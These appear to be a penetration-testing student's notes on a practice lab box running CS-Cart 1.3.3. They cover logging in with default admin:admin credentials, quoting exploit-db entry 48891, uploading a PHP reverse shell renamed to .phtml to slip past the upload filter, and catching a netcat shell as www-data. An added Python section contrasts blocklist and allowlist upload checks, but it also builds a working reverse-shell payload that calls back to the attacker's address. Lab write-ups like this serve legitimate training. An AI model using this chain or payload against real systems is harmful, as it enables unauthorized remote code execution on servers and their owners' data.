RCE


The admin page is accessible with a weak/default credential, admin:admin

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit -x php/webapps/48891.txt
  Exploit: CS-Cart 1.3.3 - authenticated RCE
      URL: https://www.exploit-db.com/exploits/48891
     Path: /usr/share/exploitdb/exploits/php/webapps/48891.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
 
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
 
 
 
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!

There is an authenticated RCE via file upload (CS-Cart 1.3.3, EDB-ID 48891); the admin:admin login above supplies the authentication it needs

Going to the Template editor under the LOOK AND FEEL tab (reachable with the admin session)

Renaming the payload from .php to .phtml before uploading it: the .php extension is filtered on upload, but the web server still hands .phtml to the PHP interpreter, so the file executes when requested

Uploaded file is available under the /skins directory
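Why the rename works, as an added example that is not from the original notes, from CS-Cart or from the exploit-db entry: the blocklist-style upload check that the .phtml trick defeats beside an allowlist check that would stop it, plus the "edit IP && PORT" payload step using the listener address from these notes. PHP_HANDLER_EXTS (the extensions Apache's mod_php maps to PHP) and SKIN_ALLOWLIST are assumptions about the target, not anything the page states; the minimal reverse shell is a stand-in for pentestmonkey's php-reverse-shell.

```python
#!/usr/bin/env python3
"""
Added example (not code from the original notes, CS-Cart or exploit-db
48891): why shell.php -> shell.phtml gets past a naive upload filter, and
what a filter that would reject it looks like.
"""
import os

# Extensions a stock Debian/Ubuntu mod_php config maps to the PHP
# interpreter (assumption; the set is version dependent, so check the
# target's php*.conf FilesMatch block rather than trusting this list).
PHP_HANDLER_EXTS = frozenset({".php", ".phtml", ".phar", ".php3", ".php4", ".php5"})

# Extensions a theme/skin upload legitimately needs (assumption for the demo).
SKIN_ALLOWLIST = frozenset({".css", ".png", ".jpg", ".gif", ".tpl"})


def server_executes(filename: str) -> bool:
    """True if the web server would run this file through PHP.
    Case-folded on purpose: treat any case as executable (conservative)."""
    return os.path.splitext(filename.lower())[1] in PHP_HANDLER_EXTS


def naive_filter_allows(filename: str) -> bool:
    """Blocklist filter of the kind the .phtml trick defeats: rejects only
    names ending in '.php' and lets every other extension through."""
    return not filename.lower().endswith(".php")


def hardened_filter_allows(filename: str) -> bool:
    """Allowlist filter: exactly one extension, taken from the allowlist,
    and no further dots in the name (so shell.phtml.jpg is rejected too)."""
    base = os.path.basename(filename)
    if base.count(".") != 1:
        return False
    return os.path.splitext(base.lower())[1] in SKIN_ALLOWLIST


def bypass_names(stem: str = "shell") -> list:
    """Names the naive filter accepts that the server would still execute."""
    return sorted(
        f"{stem}{ext}" for ext in PHP_HANDLER_EXTS
        if naive_filter_allows(f"{stem}{ext}") and server_executes(f"{stem}{ext}")
    )


def build_reverse_shell(lhost: str, lport: int) -> str:
    """Minimal PHP reverse shell (stand-in for pentestmonkey's script);
    LHOST/LPORT are filled in like the exploit's 'edit IP && PORT' step."""
    return (
        "<?php\n"
        f'$s = fsockopen("{lhost}", {lport});\n'
        "if ($s) { proc_open('/bin/sh -i', array(0 => $s, 1 => $s, 2 => $s), $p); }\n"
        "?>\n"
    )


def write_payload(lhost: str, lport: int, out_dir: str = ".") -> str:
    """Write the payload under a .phtml name and return its path."""
    name = "shell.phtml"
    # Sanity check before uploading: the name must pass the filter and still run.
    assert naive_filter_allows(name) and server_executes(name)
    path = os.path.join(out_dir, name)
    with open(path, "w") as fh:
        fh.write(build_reverse_shell(lhost, lport))
    return path


if __name__ == "__main__":
    # Attacker IP/port taken from the listener line in these notes.
    print("naive filter lets through:", bypass_names())
    print("hardened filter, shell.phtml:", hardened_filter_allows("shell.phtml"))
    print("wrote", write_payload("192.168.45.215", 9999))
```

The point to take from bypass_names() is that .phtml is only one of several handler extensions a .php-only blocklist misses; a fix that adds .phtml to the blocklist is still wrong, which is why the hardened version allowlists instead and refuses multi-dot names.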

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -i http://$IP/skins/shell.phtml

Triggering the shell with the curl request above, with the netcat listener (nnc is the local netcat listener alias) already running on port 9999

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.116.39] 51842
SOCKET: Shell has connected! PID: 5091
whoami
www-data
hostname
payday
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:9E:B2:F4  
          inet addr:192.168.116.39  Bcast:192.168.116.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe9e:b2f4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37195 errors:1 dropped:1 overruns:0 frame:0
          TX packets:22040 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2933900 (2.7 MB)  TX bytes:2122198 (2.0 MB)
          Interrupt:17 Base address:0x2000 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:503 errors:0 dropped:0 overruns:0 frame:0
          TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:682031 (666.0 KB)  TX bytes:682031 (666.0 KB)

Initial foothold established on the target as the www-data account via the file-upload RCE